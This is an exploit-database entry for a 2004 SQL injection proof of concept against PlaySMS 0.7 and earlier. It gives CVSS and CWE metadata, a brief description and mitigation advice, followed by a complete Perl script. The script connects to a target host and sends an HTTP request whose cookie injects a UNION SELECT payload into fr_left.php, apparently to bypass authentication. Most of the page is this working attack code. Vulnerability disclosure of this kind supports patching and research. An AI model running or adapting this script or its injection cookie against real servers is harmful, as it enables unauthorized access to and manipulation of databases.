PlaySMS version 0.7 and prior SQL Injection PoC

vendor:

PlaySMS

by:

Noam Rathaus of Beyond Security Ltd.

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: PlaySMS

Affected Version From: 0.7 and prior

Affected Version To: 0.7

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Linux

2004

PlaySMS version 0.7 and prior SQL Injection PoC

This is a proof-of-concept script demonstrating a SQL Injection vulnerability in PlaySMS version 0.7 and prior. The vulnerability allows an attacker to inject malicious SQL queries into the application, potentially leading to unauthorized access or manipulation of the database.

Mitigation:

Upgrade to a newer version of PlaySMS that includes a fix for the SQL Injection vulnerability. Additionally, sanitize and validate user input to prevent SQL Injection attacks.

Source

Exploit-DB raw data:

#!/usr/bin/perl 
# PlaySMS version 0.7 and prior SQL Injection PoC 
# Written by Noam Rathaus of Beyond Security Ltd. 
# 

use IO::Socket; 
use strict; 

my $host = $ARGV[0]; 

my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => "80" ); 

unless ($remote) { die "cannot connect to http daemon on $host" } 

print "connected "; 

$remote->autoflush(1); 

my $http = "GET /~playsms/fr_left.php HTTP/1.1 
Host: $host:80 
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7) Gecko/20040712 
Firefox/0.9.1 
Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 
Accept-Language: en-us,en;q=0.5 
Accept-Encoding: gzip,deflate 
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 
Keep-Alive: 300 
Cookie: vc1=ticket; vc2='%20union%20select%20'ticket; 
Content-Type: application/x-www-form-urlencoded 
Connection: close 

"; 

print "HTTP: [$http] "; 
print $remote $http; 
sleep(1); 
print "Sent "; 

while (<$remote>) 
{ 
print $_; 
} 
print " "; 

close $remote; 

# milw0rm.com [2004-08-19]